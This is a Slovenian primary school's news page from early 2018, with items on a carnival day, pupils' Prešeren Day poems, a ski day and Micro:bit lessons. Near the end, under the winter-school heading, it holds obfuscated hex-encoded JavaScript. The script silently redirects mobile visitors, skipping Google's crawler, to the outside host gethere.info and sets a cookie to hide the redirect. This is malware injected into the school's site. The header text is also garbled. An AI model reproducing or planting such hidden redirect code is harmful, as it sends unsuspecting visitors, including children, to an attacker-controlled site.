Skoči na glavno vsebino

logo-EkosolaA� A�zdravasA� A�etwinA� A�EU_flag_23LA� A�spitalic1A� A�park1A� A�eplus

OA� Pod goro

A�olska ulica 3
3210 Slovenske Konjice
03 757 29 50

PodruA?nica V parku
03 757 29 75

PodruA?nicaA�OA� A�pitaliA?
03 5763 133

Naravoslovni dan, 7. razred, 12. 2. 2018

PUST 2018 – Tehniški dan

Maškare obiskale šolsko knjižnico

Da imajo maškare poleg krofov rade tudi knjige, je pokazal današnji pustni torek. Ne samo po knjižnici, po šoli, se je sprehajal zanimiv robotek, ki se je z veseljem fotografiral z učenci 5. c razreda.

IMG_1842 IMG_1843 IMG_1845 IMG_1848 robotek

Mandala Urše Rebernak

unnamed (1)

Urša Rebernak, učenka 5. razreda OŠ V parku je tole čudovito mandalo narisala v podaljšanem bivanju. Sošolcem je pokazala, kako preprosto jo lahko sami narišejo s pomočjo šestila. Super, Urša.
unnamed

Učenci OŠ Pod goro na Infodromu

Učenci OŠ Pod goro so nastopili v oddaji Infodrom, ki je bila na sporedu 19. 1. 2018 na TV Slovenija 1. Pred koncem ocenjevalnega obdobja so mladi v Infogromu povedali, kako se na to pripravljajo. Obiskali pa so tudi Učni izdelovalni laboratorij v Slovenskih Konjicah.

8. februar, slovenski kulturni praznik

Jutri je praznični dan, poimenovan po našem največjem pesniku Francetu Prešernu.
8. februar je bil razglašen za slovenski kulturni praznik že leta 1945. Praznično oddajo po šolskem radiu smo zato začeli s himno, ki jo je na Prešernove verze uglasbil skladatelj Stanko Premrl, zapeli pa sta jo devetošolki Teja in Živa.

Prešeren ni bil poklicni pesnik, pesnjenje je bilo njegov velik dar. In kaj vse je mojstrsko skoval v verze in kitice? Marsikaj ljubezenskega, zgodovinskega, hudomušnega pa tudi družbeno kritičnega.

Učenci se s Prešernovo poezijo in pesmimi drugih, predvsem slovenskih pesnikov, največkrat srečamo pri pouku slovenščine. Včasih nam prav te njihove misli dajo navdih za to, da ustvarimo lastne pesmi. Tokrat vam v branje ponujamo štiri, in sicer o ljubezni, prijateljstvu in sreči.
Vse tri besede so močno zaznamovale tudi Prešernovo življenje. Navdih za najlepše ljubezenske pesmi je Prešernu dala njegova muza Primičeva Julija.
In kdo daje navdih šestošolki Anji za številna ljubezenska razmišljanja? Tega nismo izvedeli, zaupala pa nam je, da bi rada postala tako dobra pesnica, kot je bil njen daljni sorodnik.

Ne veš

Ne veš, koliko solz sem pretočila zate.
Tvoj pogled me hipnotizira.
Tvoj dotik je božanski.

Ti si moja sorodna duša.
Si ljubezen mojega življenja.

Ne veš, koliko časa sem sedela
v tišini in čakala nate.

Ne veš, koliko časa sem obžalovala
svojo odločitev. Ne veš, koliko časa sem te
sovražila, vendar ljubila – moje življenje je bilo
v tvojih rokah.

Sam

Sam, osamljen sem.
Mrzel hlad zraka mi zdaj boža kožo,
ko tebe ni.

Sam zdaj sedim v temi
in spominjam se tvojih dotikov,
ko sem čutil tvoj utrip,
kako si drhtela
in tvoja koža je bila topla.

Pogrešam tvoje žive oči,
tvoje roke na mojih –
POGREŠAM TE.

 V težkih trenutkih je še kako pomembno, da imamo pravega prijatelja. Prešeren je imel samo dva, Smoleta in Čopa.
O tem, da se moramo za prijateljstvo truditi, spoštovati medsebojni odnos in biti iskreni, je v svojih verzih zapisala osmošolka Fiona.

 Prijateljstvo

Prijateljstvo je lepo,
včasih pa na žalost tudi slepo.
Zvest moraš biti,
če si želiš prijatelje pridobiti.

Biti moraš tudi iskren,
to je pomemben prijateljski člen.
Enako moraš z vsemi ravnati
in vsi bodo želeli tvoji prijatelji postati.

Prijateljeve skrivnosti ne smeš izdati,
sklepanja prijateljstev nikoli se bati.
Pravega prijatelja hitro spoznaš,
tvoja naloga je le, da mu roko podaš.

Iz prijateljstva se lahko rodi tudi ljubezen in takrat nastane največja sreča za par. Pesnik Tone Pavček je zapisal:
Sreča ni pod palcem zaklad,
sreča je, če se delo dobro opravi
in če imaš nekoga rad.

Prešeren pa je že mnogo pred tem zapisal »da pevcu vedno sreča laže«.
O današnjem, tudi zmotnem prepričanju sreče, je razmišljal devetošolec Luka v svoji pesmi z naslovom Sreča.


Sreča

Sreča je različna pri vseh ljudeh,
za nekatere je to velik avto,
za druge le smeh.

Večini srečo predstavlja denar,
razkošne vile, v katerih se počutiš kot bog,
a vsak človek, potem ko je star,
si želi le še družbe svojih otrok.

Zdaj ni več veliko ljudi,
katerim družina sreča se zdi.

Tudi sreča ni več, kar je bila,
včasih je bilo to druženje,
zdaj pa denarnica brez dna.

Srečno življenje vsi si želimo,
zato delamo, se trudimo in se borimo.
A sreče ne moremo imeti vsi,
sreča je nekaj, kar se deli.

Zato uživajmo v majhnih stvareh
in naj nam srečo pričara čaroben nasmeh.

 Pesnik Prešeren se je šele v tujem svetu zavedal prave sreče, ki jo je doživljal v otroških letih. Tako je nastala ena najlepših pesmi o njegovem rojstnem kraju Vrba. Za nas sta jo izvedli Teja in Živa.

Želimo vam lep kulturni praznik, ki ga lahko praznujete tudi z obiskom marsikatere kulturne ustanove, ki na ta dan brezplačno odprejo svoja vrata.

IMG_1766 IMG_1770 IMG_1771 IMG_1773 IMG_1777

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Petošolci na Rogli

V ČETRTEK, 25.1.2018, so učenci petošolci imeli zimski športni dan. Sodelovali so v akciji Šolar na smuči, kjer je cilj smučarsko ozaveščanje otrok. Hkrati pa ta šport spoznajo tudi učenci, ki še niso nikoli smučali. Ob koncu dneva so vsi, stari in novi smučarji v en glas zatrdili, da so se imeli prečudovito, še bi smučali in škoda, da je že minilo ter da je bil nepozaben dan. Pri izvedbi tega dneva pa gre zahvala: učitelju Branetu Vodopivcu, ki je organiziral celoten dan, učiteljicama Mojci Hauptman in Valentini Kroflič, ki sta za učence skrbeli na smučanju in vaditeljem Alpske šole, ki so naučili prvih smučarskih zavojev učence, ki so prvič stali na smučeh. Pozitivno in dobro sodelovanje naše šole z vaditelji Alpske šole je bilo tako obojestransko.

20180125_141103

Zabavno programiranje z Micro:bit-om

Učencem, ki obiskujejo računalniške predmete in krožke ter nadarjenim učencem smo omogočili programiranje z Micro:bit-om. Trenutno imamo 11 kompletov. Micro:bit je elektronsko vezje, kjer je nameščen ARM Cortex-M0 procesor, merilnik pospeška, Bluetooth povezava in USB priključek. Nameščen je zaslon, sestavljen iz 25 LED. Na plošči sta dva glavna gumba A in B. Nameščena je radijska antena in termometer.  Napaja se preko USB ali zunanji akumulatorskim paketom.Vhodi in izhodi naprave gredo preko pet obročastih konektorjev, ki so del 23-nožnega robnega priključka. Na njega lahko priključimo različne senzorje in motorje. V bistvu lahko z njim ustvarimo vse kar si zaželimo.

Programiranje je v blokovni obliki zelo enostavno, saj program omogoča slovenski jezik. Prednost Micro:bit-a je ta, da lahko preklapljamo iz blokovnega programiranja v ukazno programiranje. Tako se lahko na dokaj lahek način naučimo programirati v programskem jeziku Python ali JavaScript. Program ima nameščen simulator Micro:bit-a, tako da v osnovi, pri začetnem učenju ne rabimo Micro:bit-a v fizični obliki.

IMG_8092

Ustvarjamo s 3D pisali

Pouk smo popestrili z ustvarjanjem s 3D pisali. 3D pisala delujejo po enakem principu kot 3D tiskalniki, vendar v tem primeru izdelka ne ustvari računalnik ampak učenec sam s svojimi ročnimi spretnostmi. Filament PLA je iz naravnega materiala in omogoča izdelavo različnih izdelkov. Učenci uživajo v delu z njimi.

IMG_8093 IMG_8095 IMG_8097 IMG_8098IMG_8029 IMG_8030

Zimska šola v naravi – 6. razred

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Dostopnost
//